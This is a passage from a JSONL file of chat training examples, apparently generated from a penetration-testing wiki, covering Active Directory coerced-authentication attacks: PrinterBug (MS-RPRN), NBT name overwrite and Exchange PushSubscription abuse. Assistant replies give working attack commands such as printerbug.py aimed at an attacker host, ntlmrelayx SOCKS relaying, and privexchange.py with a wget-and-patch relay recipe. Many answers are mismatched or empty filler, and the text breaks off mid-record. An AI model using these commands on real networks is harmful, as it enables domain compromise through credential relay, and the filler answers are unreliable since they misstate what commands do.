"row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for MS-RPRN abuse (PrinterBug) - Theory"}, {"role": "assistant", "content": "Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a \"won't fix\" and enabled by default on all Windows environments (more info on the finding).\n\nThe coerced authentications are made over SMB. But MS-RPRN abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.\n\nThe \"specific call\" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.\n\n> [!TIP]\n> The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \\pipe\\spoolss named pipe through the IPC$ share."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for MS-RPRN abuse (PrinterBug) - Theory", "response": "Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a \"won't fix\" and enabled by default on all Windows environments (more info on the finding).\n\nThe coerced authentications are made over SMB. But MS-RPRN abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.\n\nThe \"specific call\" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.\n\n> [!TIP]\n> The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \\pipe\\spoolss named pipe through the IPC$ share.", "metadata": {"corpus_index": 880, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is MS-RPRN abuse (PrinterBug) - Practice?"}, {"role": "assistant", "content": "Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).\n\nThe spooler service can be triggered with printerbug or SpoolSample (C#). There are many alternatives available publicly on the Internet.\n\n::: tabs\n\n=== printerbug\n\nTrigger the spooler service\n\n``bash\nprinterbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'\n`\n\n=== rpcdump\n\nCheck if the spooler service is available\n\n`bash\nrpcdump.py $TARGET | grep -A 6 \"spoolsv\"\n`\n\n=== SpoolerScanner\n\nCheck if the spooler service is available\n\n`\nImport-Module .\\Get-SpoolStatus.ps1\nForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}\n`\n\n=== ntlmrelayx\n\nIn the situation where the tester doesn't have any credentials, it is still possible to relay an authentication and trigger the spooler service of a target via a SOCKS proxy.\n\n`bash\nntlmrelayx.py -t smb://$TARGET -socks\nproxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'\n``\n\n:::\n\n> [!TIP]\n> Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of NTLM relay. For instance, an \"unsigning cross-protocols relay attack\" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is MS-RPRN abuse (PrinterBug) - Practice?", "response": "Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).\n\nThe spooler service can be triggered with printerbug or SpoolSample (C#). There are many alternatives available publicly on the Internet.\n\n::: tabs\n\n=== printerbug\n\nTrigger the spooler service\n\n``bash\nprinterbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'\n`\n\n=== rpcdump\n\nCheck if the spooler service is available\n\n`bash\nrpcdump.py $TARGET | grep -A 6 \"spoolsv\"\n`\n\n=== SpoolerScanner\n\nCheck if the spooler service is available\n\n`\nImport-Module .\\Get-SpoolStatus.ps1\nForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}\n`\n\n=== ntlmrelayx\n\nIn the situation where the tester doesn't have any credentials, it is still possible to relay an authentication and trigger the spooler service of a target via a SOCKS proxy.\n\n`bash\nntlmrelayx.py -t smb://$TARGET -socks\nproxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'\n``\n\n:::\n\n> [!TIP]\n> Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of NTLM relay. For instance, an \"unsigning cross-protocols relay attack\" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.", "metadata": {"corpus_index": 881, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform MS-RPRN abuse (PrinterBug) - Practice?"}, {"role": "assistant", "content": "Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).\n\nThe spooler service can be triggered with printerbug or SpoolSample (C#). There are many alternatives available publicly on the Internet.\n\n::: tabs\n\n=== printerbug\n\nTrigger the spooler service\n\n``bash\nprinterbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'\n`\n\n=== rpcdump\n\nCheck if the spooler service is available\n\n`bash\nrpcdump.py $TARGET | grep -A 6 \"spoolsv\"\n`\n\n=== SpoolerScanner\n\nCheck if the spooler service is available\n\n`\nImport-Module .\\Get-SpoolStatus.ps1\nForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}\n`\n\n=== ntlmrelayx\n\nIn the situation where the tester doesn't have any credentials, it is still possible to relay an authentication and trigger the spooler service of a target via a SOCKS proxy.\n\n`bash\nntlmrelayx.py -t smb://$TARGET -socks\nproxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'\n``\n\n:::\n\n> [!TIP]\n> Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of NTLM relay. For instance, an \"unsigning cross-protocols relay attack\" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform MS-RPRN abuse (PrinterBug) - Practice?", "response": "Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).\n\nThe spooler service can be triggered with printerbug or SpoolSample (C#). There are many alternatives available publicly on the Internet.\n\n::: tabs\n\n=== printerbug\n\nTrigger the spooler service\n\n``bash\nprinterbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'\n`\n\n=== rpcdump\n\nCheck if the spooler service is available\n\n`bash\nrpcdump.py $TARGET | grep -A 6 \"spoolsv\"\n`\n\n=== SpoolerScanner\n\nCheck if the spooler service is available\n\n`\nImport-Module .\\Get-SpoolStatus.ps1\nForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}\n`\n\n=== ntlmrelayx\n\nIn the situation where the tester doesn't have any credentials, it is still possible to relay an authentication and trigger the spooler service of a target via a SOCKS proxy.\n\n`bash\nntlmrelayx.py -t smb://$TARGET -socks\nproxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'\n``\n\n:::\n\n> [!TIP]\n> Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of NTLM relay. For instance, an \"unsigning cross-protocols relay attack\" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.", "metadata": {"corpus_index": 881, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the printerbug.py command to ms-rprn abuse (printerbug) - practice"}, {"role": "assistant", "content": "printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the printerbug.py command to ms-rprn abuse (printerbug) - practice", "response": "printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'", "metadata": {"corpus_index": 882, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "printerbug.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out MS-RPRN abuse (PrinterBug) - Practice during a pentest?"}, {"role": "assistant", "content": "printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out MS-RPRN abuse (PrinterBug) - Practice during a pentest?", "response": "printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'", "metadata": {"corpus_index": 882, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'`?"}, {"role": "assistant", "content": "This command is used for ms-rprn abuse (printerbug) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'`?", "response": "This command is used for ms-rprn abuse (printerbug) - practice. Practice", "metadata": {"corpus_index": 882, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use rpcdump.py for ms-rprn abuse (printerbug) - practice?"}, {"role": "assistant", "content": "rpcdump.py $TARGET | grep -A 6 \"spoolsv\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use rpcdump.py for ms-rprn abuse (printerbug) - practice?", "response": "rpcdump.py $TARGET | grep -A 6 \"spoolsv\"", "metadata": {"corpus_index": 883, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "rpcdump.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MS-RPRN abuse (PrinterBug) - Practice"}, {"role": "assistant", "content": "rpcdump.py $TARGET | grep -A 6 \"spoolsv\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MS-RPRN abuse (PrinterBug) - Practice", "response": "rpcdump.py $TARGET | grep -A 6 \"spoolsv\"", "metadata": {"corpus_index": 883, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `rpcdump.py $TARGET | grep -A 6 \"spoolsv\"`?"}, {"role": "assistant", "content": "This command is used for ms-rprn abuse (printerbug) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `rpcdump.py $TARGET | grep -A 6 \"spoolsv\"`?", "response": "This command is used for ms-rprn abuse (printerbug) - practice. Practice", "metadata": {"corpus_index": 883, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Import-Module syntax for ms-rprn abuse (printerbug) - practice?"}, {"role": "assistant", "content": "Import-Module .\\Get-SpoolStatus.ps1\nForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Import-Module syntax for ms-rprn abuse (printerbug) - practice?", "response": "Import-Module .\\Get-SpoolStatus.ps1\nForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}", "metadata": {"corpus_index": 884, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Import-Module"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do MS-RPRN abuse (PrinterBug) - Practice"}, {"role": "assistant", "content": "Import-Module .\\Get-SpoolStatus.ps1\nForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do MS-RPRN abuse (PrinterBug) - Practice", "response": "Import-Module .\\Get-SpoolStatus.ps1\nForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}", "metadata": {"corpus_index": 884, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Import-Module .\\Get-SpoolStatus.ps1`?"}, {"role": "assistant", "content": "This command is used for ms-rprn abuse (printerbug) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Import-Module .\\Get-SpoolStatus.ps1`?", "response": "This command is used for ms-rprn abuse (printerbug) - practice. Practice", "metadata": {"corpus_index": 884, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use ntlmrelayx.py for ms-rprn abuse (printerbug) - practice?"}, {"role": "assistant", "content": "ntlmrelayx.py -t smb://$TARGET -socks\nproxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use ntlmrelayx.py for ms-rprn abuse (printerbug) - practice?", "response": "ntlmrelayx.py -t smb://$TARGET -socks\nproxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'", "metadata": {"corpus_index": 885, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for MS-RPRN abuse (PrinterBug) - Practice"}, {"role": "assistant", "content": "ntlmrelayx.py -t smb://$TARGET -socks\nproxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for MS-RPRN abuse (PrinterBug) - Practice", "response": "ntlmrelayx.py -t smb://$TARGET -socks\nproxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'", "metadata": {"corpus_index": 885, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntlmrelayx.py -t smb://$TARGET -socks`?"}, {"role": "assistant", "content": "This command is used for ms-rprn abuse (printerbug) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntlmrelayx.py -t smb://$TARGET -socks`?", "response": "This command is used for ms-rprn abuse (printerbug) - practice. Practice", "metadata": {"corpus_index": 885, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ NBT Name Overwrite"}, {"role": "assistant", "content": "https://twitter.com/PythonResponder/status/1379251124985851904"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ NBT Name Overwrite", "response": "https://twitter.com/PythonResponder/status/1379251124985851904", "metadata": {"corpus_index": 886, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/nbt-name-overwrite.md", "page_title": "🛠️ NBT Name Overwrite", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ NBT Name Overwrite"}, {"role": "assistant", "content": "https://twitter.com/PythonResponder/status/1379251124985851904"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ NBT Name Overwrite", "response": "https://twitter.com/PythonResponder/status/1379251124985851904", "metadata": {"corpus_index": 886, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/nbt-name-overwrite.md", "page_title": "🛠️ NBT Name Overwrite", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does PushSubscription abuse - Theory work?"}, {"role": "assistant", "content": "\"PushSubscription\" is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. The coerced authentication is made over HTTP, which is particularly powerful when doing NTLM relay (because of the Session Signing and MIC mitigations). As Exchange servers usually have high privileges in a domain (i.e. WriteDacl, see Abusing ACLs), the forced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does PushSubscription abuse - Theory work?", "response": "\"PushSubscription\" is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. The coerced authentication is made over HTTP, which is particularly powerful when doing NTLM relay (because of the Session Signing and MIC mitigations). As Exchange servers usually have high privileges in a domain (i.e. WriteDacl, see Abusing ACLs), the forced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations).", "metadata": {"corpus_index": 887, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md", "page_title": "PushSubscription abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute PushSubscription abuse - Theory?"}, {"role": "assistant", "content": "\"PushSubscription\" is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. The coerced authentication is made over HTTP, which is particularly powerful when doing NTLM relay (because of the Session Signing and MIC mitigations). As Exchange servers usually have high privileges in a domain (i.e. WriteDacl, see Abusing ACLs), the forced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute PushSubscription abuse - Theory?", "response": "\"PushSubscription\" is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. The coerced authentication is made over HTTP, which is particularly powerful when doing NTLM relay (because of the Session Signing and MIC mitigations). As Exchange servers usually have high privileges in a domain (i.e. WriteDacl, see Abusing ACLs), the forced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations).", "metadata": {"corpus_index": 887, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md", "page_title": "PushSubscription abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe PushSubscription abuse - Practice in the context of penetration testing"}, {"role": "assistant", "content": "PrivExchange (Python) is a tool able to log in on Exchange Web Services and call that API.\n\n``bash\nprivexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET\n`\n\n> [!TIP]\n> In the situation where the tester doesn't have any credentials, it is still possible to relay an authentication to make the API call.\n> \n> The modified httpattack.py can be used with ntlmrelayx.py to perform this attack. The attacker host needs to be modified in the script since it is hard-coded.\n> \n> `bash\n> cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py\n> mv httpattack.py httpattack.py.old\n> wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py\n> sed -i 's/attacker_url = .*$/attacker_url = \"$ATTACKER_URL\"/' httpattack.py\n> cd /PATH/TO/impacket\n> pip3 install .\n> ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx\n> ``\n\n> [!NOTE]\n> On February 12th 2019, Microsoft released updates for Exchange which resolved\n> \n> * the coerced authentication issue\n> * the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe PushSubscription abuse - Practice in the context of penetration testing", "response": "PrivExchange (Python) is a tool able to log in on Exchange Web Services and call that API.\n\n``bash\nprivexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET\n`\n\n> [!TIP]\n> In the situation where the tester doesn't have any credentials, it is still possible to relay an authentication to make the API call.\n> \n> The modified httpattack.py can be used with ntlmrelayx.py to perform this attack. The attacker host needs to be modified in the script since it is hard-coded.\n> \n> `bash\n> cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py\n> mv httpattack.py httpattack.py.old\n> wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py\n> sed -i 's/attacker_url = .*$/attacker_url = \"$ATTACKER_URL\"/' httpattack.py\n> cd /PATH/TO/impacket\n> pip3 install .\n> ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx\n> ``\n\n> [!NOTE]\n> On February 12th 2019, Microsoft released updates for Exchange which resolved\n> \n> * the coerced authentication issue\n> * the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.", "metadata": {"corpus_index": 888, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md", "page_title": "PushSubscription abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through PushSubscription abuse - Practice"}, {"role": "assistant", "content": "PrivExchange (Python) is a tool able to log in on Exchange Web Services and call that API.\n\n``bash\nprivexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET\n`\n\n> [!TIP]\n> In the situation where the tester doesn't have any credentials, it is still possible to relay an authentication to make the API call.\n> \n> The modified httpattack.py can be used with ntlmrelayx.py to perform this attack. The attacker host needs to be modified in the script since it is hard-coded.\n> \n> `bash\n> cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py\n> mv httpattack.py httpattack.py.old\n> wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py\n> sed -i 's/attacker_url = .*$/attacker_url = \"$ATTACKER_URL\"/' httpattack.py\n> cd /PATH/TO/impacket\n> pip3 install .\n> ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx\n> ``\n\n> [!NOTE]\n> On February 12th 2019, Microsoft released updates for Exchange which resolved\n> \n> * the coerced authentication issue\n> * the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through PushSubscription abuse - Practice", "response": "PrivExchange (Python) is a tool able to log in on Exchange Web Services and call that API.\n\n``bash\nprivexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET\n`\n\n> [!TIP]\n> In the situation where the tester 